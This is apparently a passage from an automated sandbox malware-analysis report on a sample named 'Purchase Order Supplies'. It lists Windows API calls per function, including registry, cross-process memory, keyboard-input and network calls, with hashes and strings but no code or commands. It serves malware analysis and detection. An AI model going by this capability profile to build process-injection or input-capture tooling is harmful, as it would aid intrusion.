                            • Part of subcall function 00CAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF282
                            • Part of subcall function 00CAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF2A6
                          Similarity
                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                          • String ID:
                          • API String ID: 327935632-0
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                            • Part of subcall function 00CF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2AA6,?,?), ref: 00CF3B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF2DE0
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF2E1F
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CF2E66
                          • RegCloseKey.ADVAPI32(?,?), ref: 00CF2E92
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF2E9F
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3440857362-0
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CE17D4
                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CE17FD
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CE183C
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CE1861
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CE1869
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                          • String ID:
                          • API String ID: 1389676194-0
                          APIs
                          • GetCursorPos.USER32(000000FF), ref: 00CAB749
                          • ScreenToClient.USER32(00000000,000000FF), ref: 00CAB766
                          • GetAsyncKeyState.USER32(00000001), ref: 00CAB78B
                          • GetAsyncKeyState.USER32(00000002), ref: 00CAB799
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00CCC156
                          • PostMessageW.USER32(?,00000201,00000001), ref: 00CCC200
                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00CCC208
                          • PostMessageW.USER32(?,00000202,00000000), ref: 00CCC216
                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00CCC21E
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00CCE9CD
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CCE9EA
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CCEA22
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CCEA48
                          • _wcsstr.LIBCMT ref: 00CCEA52
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                          • String ID:
                          • API String ID: 3902887630-0
                          APIs
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CCCA86
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CCCAB8
                          • __itow.LIBCMT ref: 00CCCAD0
                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CCCAF6
                          • __itow.LIBCMT ref: 00CCCB07
                          Similarity
                          • API ID: MessageSend$__itow$_memmove
                          • String ID:
                          • API String ID: 2983881199-0
                          APIs
                          • IsWindow.USER32(00000000), ref: 00CE89CE
                          • GetForegroundWindow.USER32 ref: 00CE89E5
                          • GetDC.USER32(00000000), ref: 00CE8A21
                          • GetPixel.GDI32(00000000,?,00000003), ref: 00CE8A2D
                          • ReleaseDC.USER32(00000000,00000003), ref: 00CE8A68
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          • String ID:
                          • API String ID: 4156661090-0
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAB5EB
                          • SelectObject.GDI32(?,00000000), ref: 00CAB5FA
                          • BeginPath.GDI32(?), ref: 00CAB611
                          • SelectObject.GDI32(?,00000000), ref: 00CAB63B
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          APIs
                          • __calloc_crt.LIBCMT ref: 00CB2E81
                          • CreateThread.KERNEL32(?,?,00CB2FB7,00000000,?,?), ref: 00CB2EC5
                          • GetLastError.KERNEL32 ref: 00CB2ECF
                          • _free.LIBCMT ref: 00CB2ED8
                          • __dosmaperr.LIBCMT ref: 00CB2EE3
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          Similarity
                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                          • String ID:
                          • API String ID: 2664167353-0
                          APIs
                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCB903
                          • GetLastError.KERNEL32(?,00CCB3CB,?,?,?), ref: 00CCB90D
                          • GetProcessHeap.KERNEL32(00000008,?,?,00CCB3CB,?,?,?), ref: 00CCB91C
                          • RtlAllocateHeap.NTDLL(00000000,?,00CCB3CB), ref: 00CCB923
                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCB93A
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 883493501-0
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD8371
                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CD837F
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CD8387
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CD8391
                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD83CD
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          APIs
                          • CLSIDFromProgID.COMBASE ref: 00CCA874
                          • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00CCA88F
                          • lstrcmpiW.KERNEL32(?,00000000), ref: 00CCA89D
                          • CoTaskMemFree.COMBASE(00000000), ref: 00CCA8AD
                          • CLSIDFromString.COMBASE(?,?), ref: 00CCA8B9
                          Similarity
                          • API ID: From$Prog$FreeStringTasklstrcmpi
                          • String ID:
                          • API String ID: 3897988419-0
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CCB806
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CCB810
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CCB81F
                          • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00CCB826
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CCB83C
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CCB7A5
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CCB7AF
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CCB7BE
                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00CCB7C5
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CCB7DB
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00CCFA8F
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CCFAA6
                          • MessageBeep.USER32(00000000), ref: 00CCFABE
                          • KillTimer.USER32(?,0000040A), ref: 00CCFADA
                          • EndDialog.USER32(?,00000001), ref: 00CCFAF4
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          APIs
                          • EndPath.GDI32(?), ref: 00CAB526
                          • StrokeAndFillPath.GDI32(?,?,00D0F583,00000000,?), ref: 00CAB542
                          • SelectObject.GDI32(?,00000000), ref: 00CAB555
                          • DeleteObject.GDI32 ref: 00CAB568
                          • StrokePath.GDI32(?), ref: 00CAB583
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 00CDFAB2
                          • CoCreateInstance.COMBASE(00D1DA7C,00000000,00000001,00D1D8EC,?), ref: 00CDFACA
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • CoUninitialize.COMBASE ref: 00CDFD2D
                          Strings
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_memmove
                          • String ID: .lnk
                          • API String ID: 2683427295-24824748
                          APIs
                            • Part of subcall function 00CD78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00CD78CB
                          • CoInitialize.OLE32(00000000), ref: 00CDF04D
                          • CoCreateInstance.COMBASE(00D1DA7C,00000000,00000001,00D1D8EC,?), ref: 00CDF066
                          • CoUninitialize.COMBASE ref: 00CDF083
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          Strings
                          Similarity
                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                          • String ID: .lnk
                          • API String ID: 2126378814-24824748
                          Strings
                          Similarity
                          • API ID:
                          • String ID: #$+
                          • API String ID: 0-2552117581
                          APIs
                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00D2DC40,?,0000000F,0000000C,00000016,00D2DC40,?), ref: 00CD507B
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                            • Part of subcall function 00C9B8A7: _memmove.LIBCMT ref: 00C9B8FB
                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00CD50FB
                          Strings
                          Similarity
                          • API ID: BuffCharUpper$__itow__swprintf_memmove
                          • String ID: REMOVE$THIS
                          • API String ID: 2528338962-776492005
                          APIs
                            • Part of subcall function 00CD4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCC9FE,?,?,00000034,00000800,?,00000034), ref: 00CD4D6B
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CCCFC9
                            • Part of subcall function 00CD4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00CD4D36
                            • Part of subcall function 00CD4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00CD4C90
                            • Part of subcall function 00CD4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CCC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00CD4CA0
                            • Part of subcall function 00CD4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CCC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00CD4CB6
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CCD036
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CCD083
                          Strings
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D2DBF0,00000000,?,?,?,?), ref: 00CFA4E6
                          • GetWindowLongW.USER32 ref: 00CFA503
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CFA513
                          Strings
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          APIs
                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CFA74F
                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CFA75D
                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CFA764
                          Strings
                          Similarity
                          • API ID: MessageSend$DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 4014797782-2298589950
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CF983D
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CF984D
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CF9872
                          Strings
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CFA27B
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CFA290
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CFA29D
                          Strings
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00CB2F79
                          • GetProcAddress.KERNEL32(00000000), ref: 00CB2F80
                          Strings
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RoInitialize$combase.dll
                          • API String ID: 2574300362-340411864
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00CB2F4E), ref: 00CB304E
                          • GetProcAddress.KERNEL32(00000000), ref: 00CB3055
                          Strings
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RoUninitialize$combase.dll
                          • API String ID: 2574300362-2819208100
                          APIs
                          Strings
                          Similarity
                          • API ID: LocalTime__swprintf
                          • String ID: %.3d$WIN_XPe
                          • API String ID: 2070861257-2409531811
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CAE6D9,?,00CAE55B,00D2DC28,?,?), ref: 00CAE6F1
                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00CAE703
                          Strings
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: IsWow64Process$kernel32.dll
                          • API String ID: 2574300362-3024904723
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CAE69C,75730AE0,00CAE5AC,00D2DC28,?,?), ref: 00CAE6B4
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00CAE6C6
                          Strings
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 2574300362-192647395
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CEEBAF,?,00CEEAAC), ref: 00CEEBC7
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CEEBD9
                          Strings
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                          • API String ID: 2574300362-1816364905
                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00CD1371,?,00CD1519), ref: 00CD13B4
                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00CD13C6
                          Strings
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1587604923
                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,00CD135F,?,00CD1440), ref: 00CD1389
                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00CD139B
                          Strings
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1071820185
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00CF3AC2,?,00CF3CF7), ref: 00CF3ADA
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CF3AEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2574300362-4033151799
                          APIs
                          • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00CE6AA6), ref: 00C9AB2D
                          • _wcscmp.LIBCMT ref: 00C9AB49
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharUpper_wcscmp
                          • String ID:
                          • API String ID: 820872866-0
                          APIs
                          • CharLowerBuffW.USER32(?,?), ref: 00CF0D85
                          • CharLowerBuffW.USER32(?,?), ref: 00CF0DC8
                            • Part of subcall function 00CF0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00CF0478
                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CF0FB2
                          • _memmove.LIBCMT ref: 00CF0FC2
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharLower$AllocVirtual_memmove
                          • String ID:
                          • API String ID: 3659485706-0
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 00CEAF56
                          • CoUninitialize.COMBASE ref: 00CEAF61
                            • Part of subcall function 00CD1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00CD10B8
                          • VariantInit.OLEAUT32(?), ref: 00CEAF6C
                          • VariantClear.OLEAUT32(?), ref: 00CEB23F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                          • String ID:
                          • API String ID: 780911581-0
                          APIs
                          • _memmove.LIBCMT ref: 00C9C419
                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00CD6653,?,?,00000000), ref: 00C9C495
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FileRead_memmove
                          • String ID:
                          • API String ID: 1325644223-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                          • String ID:
                          • API String ID: 3877424927-0
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00CFC354
                          • ScreenToClient.USER32(?,00000002), ref: 00CFC384
                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00CFC3EA
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00CCD258
                          • __itow.LIBCMT ref: 00CCD292
                            • Part of subcall function 00CCD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00CCD549
                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00CCD2FB
                          • __itow.LIBCMT ref: 00CCD350
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$__itow
                          • String ID:
                          • API String ID: 3379773720-0
                          APIs
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CDEF32
                          • GetLastError.KERNEL32(?,00000000), ref: 00CDEF58
                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CDEF7D
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CDEFA9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CFB3E1
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00CFD617
                          • GetWindowRect.USER32(?,?), ref: 00CFD68D
                          • PtInRect.USER32(?,?,00CFEB2C), ref: 00CFD69D
                          • MessageBeep.USER32(00000000), ref: 00CFD70E
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          APIs
                          • GetKeyboardState.USER32(?,7697C0D0,?,00008000), ref: 00CD44EE
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CD450A
                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00CD456A
                          • SendInput.USER32(00000001,?,0000001C,7697C0D0,?,00008000), ref: 00CD45C8
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CC4DE8
                          • __isleadbyte_l.LIBCMT ref: 00CC4E16
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00CC4E44
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00CC4E7A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          APIs
                          • GetForegroundWindow.USER32 ref: 00CF7AB6
                            • Part of subcall function 00CD69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD69E3
                            • Part of subcall function 00CD69C9: GetCurrentThreadId.KERNEL32 ref: 00CD69EA
                            • Part of subcall function 00CD69C9: AttachThreadInput.USER32(00000000,?,00CD8127), ref: 00CD69F1
                          • GetCaretPos.USER32(?), ref: 00CF7AC7
                          • ClientToScreen.USER32(00000000,?), ref: 00CF7B00
                          • GetForegroundWindow.USER32 ref: 00CF7B06
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE49B7
                            • Part of subcall function 00CE4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CE4A60
                            • Part of subcall function 00CE4A41: InternetCloseHandle.WININET(00000000), ref: 00CE4AFD
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Internet$CloseConnectHandleOpen
                          • String ID:
                          • API String ID: 1463438336-0
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00CF88A3
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CF88BD
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CF88CB
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CF88D9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00CE906D
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00CE907F
                          • accept.WS2_32(00000000,00000000,00000000), ref: 00CE908C
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE90A3
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          Similarity
                          • API ID: ErrorLastacceptselect
                          • String ID:
                          • API String ID: 385091864-0
                          APIs
                            • Part of subcall function 00CD2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CD18FD,?,?,?,00CD26BC,00000000,000000EF,00000119,?,?), ref: 00CD2CB9
                            • Part of subcall function 00CD2CAA: lstrcpyW.KERNEL32(00000000,?,?,00CD18FD,?,?,?,00CD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CD2CDF
                            • Part of subcall function 00CD2CAA: lstrcmpiW.KERNEL32(00000000,?,00CD18FD,?,?,?,00CD26BC,00000000,000000EF,00000119,?,?), ref: 00CD2D10
                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CD1916
                          • lstrcpyW.KERNEL32(00000000,?,?,00CD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CD193C
